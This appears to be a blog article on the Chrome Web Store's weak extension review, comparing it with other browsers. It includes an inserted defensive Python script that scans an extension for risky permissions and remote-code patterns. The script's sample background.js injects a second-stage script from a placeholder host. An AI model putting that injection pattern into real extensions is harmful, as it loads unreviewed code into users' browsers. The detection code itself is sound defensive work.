By definition, browser extensions can access some very sensitive data: your passwords, browsing history, and the very content of all the websites you visit. Recently, Jack was looking for a reading mode extension for Chrome, and together we realized that the Chrome Web Store is still very much like the Wild West—or at least it seems like it.
Sure, we read a lot about web security in general, but today we’ll take a closer look at browser extensions. Overall, there’s been some progress, but for now I’ll just say this: even though they come through an official store, you still have to be much more wary of random extensions you find on the Chrome Web Store than of mobile apps. After looking at the guidelines and review process, we found it’s not as secure as it should be.
(Editor's note: I have since covered Duo's free-to-use tool called the CRXcavator, which helps determine how safe Chrome extensions are. Additionally, Google released their Chrome Browser Cloud Management to help admins manage extensions.)
So what’s the reality?
A simple Google search shows just how pervasive malware in extensions has been on the Chrome Web Store over the years, and how slow Google has been to respond to issues.
In 2015, Google eliminated the ability to install extensions from outside the Chrome Web Store. Yet that barely impeded developers’ ability to get malware to users. So far, through June 2018, over 20 million Chrome users have become victims of fake ad blockers on the store, often parading around with nearly identical names to legitimate ones and duping users who don’t look carefully at what they’re installing. Additionally, in March, another 100,000 users were exposed to extensions designed to steal data and mine cryptocurrency through an exploit in the Nigelify extension.
Also, a once-legitimate extension could get sold by the original developer to a third party that might not have your best interests at heart. The new owner can quietly modify the extension; usually it’s done to inject ads and sponsored links into your browser.
Why is it easy to get a harmful extension into the Chrome Web Store?
It doesn’t take much to get an extension onto the Chrome Web Store. Once you’ve developed one, log into any Google account, pay a $5 registration fee, and you’re ready to go. Then you upload your extension and Google runs an automated review of it. In nearly all cases, that’s it. (Sometimes an extension might require a manual review over program policy issues.)
Google has extensive documentation about what developers should do with their extensions to keep users safe, but a developer only needs to get past the automated review. And if an extension with malware is discovered in the store? Too often it takes online publications making a stink before Google lumbers into action and pulls it down (and removes it from the browsers of Chrome users who installed the harmful extension).
One way malicious extensions have gotten around the review process is by downloading the payload after initial installation from the Chrome Web Store, so that it isn’t contained in the shipped version. This was a known vulnerability back in 2016; it isn’t clear whether Google ever patched it. They say it’s not allowed, but I can’t find any evidence that you can’t still simply do it anyway.
Though we’re beating up Google a bit in this article about their slow response time and lack of human review, that doesn’t mean they haven’t done anything to try to make extensions safer. You used to be able to install extensions directly from any third-party website. But in 2015, Google required all extensions to be hosted in the Chrome Web Store. Then, in 2018, the company officially deprecated inline installation altogether, in a three-phase rollout currently in progress.
To Google’s credit, Chrome extensions do declare permissions before installation, giving users a chance to see how much access a specific extension requires. Some permissions include: reading and changing your browser history, reading and changing all your data on websites you visit, capturing on-screen content, and detecting your location. Other browsers don’t do this, with all Firefox extensions having full access, for example. It would be interesting if Google brought the granular permissions model used on Android over to Chrome, allowing users more control over extensions.
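The two defender-side checks the last few paragraphs imply, flagging the broad permissions listed above and spotting code that is loaded at run time rather than shipped in the reviewed package, can be run over an unpacked extension before installing it. The script below is an added example, not code from the original article or from any store tooling; the mapping from the article's capability descriptions to Chrome permission names, the source patterns, and the sample "Reader Mode" extension are all assumptions constructed for the demonstration.

```python
import json
import re

# Capabilities the article lists, mapped to the Chrome permission names that
# grant them (assumed mapping; the article names capabilities, not identifiers).
RISKY_PERMISSIONS = {
    "history": "read and change your browsing history",
    "desktopCapture": "capture on-screen content",
    "geolocation": "detect your location",
}
# Host permissions that grant access to data on every site the user visits.
BROAD_HOSTS = re.compile(r"^(<all_urls>|\*://\*/|https?://\*/)")

# Source-level hints that code is fetched or built at run time instead of
# being present in the package the automated review actually looked at.
REMOTE_CODE_PATTERNS = [
    (re.compile(r"\beval\s*\("), "eval() of a dynamic string"),
    (re.compile(r"\bnew\s+Function\s*\("), "Function constructor"),
    (re.compile(r"executeScript\s*\(\s*\{[^}]*\bcode\s*:"), "executeScript with a code string"),
    (re.compile(r"createElement\s*\(\s*['\"]script['\"]"), "run-time <script> injection"),
]


def triage(manifest: dict, scripts: dict) -> list:
    """Return human-readable findings for an unpacked extension.

    manifest: parsed manifest.json; scripts: {filename: JavaScript source}.
    """
    findings = []
    for perm in manifest.get("permissions", []):
        if perm in RISKY_PERMISSIONS:
            findings.append(f"permission {perm!r}: {RISKY_PERMISSIONS[perm]}")
        elif BROAD_HOSTS.match(perm):
            findings.append(f"host permission {perm!r}: read and change data on every site")
    for name, src in scripts.items():
        for pattern, label in REMOTE_CODE_PATTERNS:
            if pattern.search(src):
                findings.append(f"{name}: {label}")
    return findings


# Constructed sample: a "reading mode" extension that asks for far more than it
# needs and pulls a second-stage script from a placeholder URL after install.
SAMPLE_MANIFEST = json.loads('{"name": "Reader Mode", "manifest_version": 2, '
                            '"permissions": ["activeTab", "history", "<all_urls>", "geolocation"]}')
SAMPLE_SCRIPTS = {
    "background.js": "const s = document.createElement('script');\n"
                     "s.src = 'https://PLACEHOLDER.invalid/stage2.js';\n"
                     "document.head.appendChild(s);\n",
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print("WARN", finding)
```

A clean result from this check is not proof of safety (the article's point is that automated review is exactly what gets fooled), but a noisy result on a "reading mode" extension is a clear reason not to install it.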
Is this an issue across all major browsers with extensions?
To get an extension (or Add-on) into their marketplace, Firefox requires developers to submit the source code for administrators to review. (Update: WebExtensions are computer reviewed, while AMOs still receive human reviews.)
Safari used to allow inline Safari extensions, but has since moved to a much more locked-down experience, akin to submitting an app for the App Store (review process documentation) or the Extensions Gallery (which is closing down with Safari 12 on the way).
Microsoft’s newer browser remains the most strict when it comes to extensions. It’s very locked down and requires express permission from Microsoft before a developer can even submit an extension for manual review and eventual publishing to the Microsoft Store.
All Opera extensions go through a review process and must be in the Opera Addons Catalog, but developers can offer inline installation for approved, live extensions.
Conclusion: Be cautious, be wary
While the Chrome Web Store isn’t as safe or patrolled as it should be, that doesn’t mean it’s unusable. To stay safe, just do all the standard things you would do when checking for malware or phishing. Double-check that the extension name is correct and that you know the exact spelling and capitalization of the legitimate extension; read through the description for odd spelling or grammatical issues; and check the reviews, both for positive ones and for fakes. Don’t download just any extension—be sure you know what you’re downloading and what you’re giving permissions to.
The Chrome Web Store isn’t the Wild West, but extensions aren’t as closely reviewed as they should be. If Apple, Microsoft, and Mozilla can ensure all extensions go before a human reviewer, why can’t Google? Automated systems can be easily fooled (not that humans are infallible, either). I mean, have we learned nothing?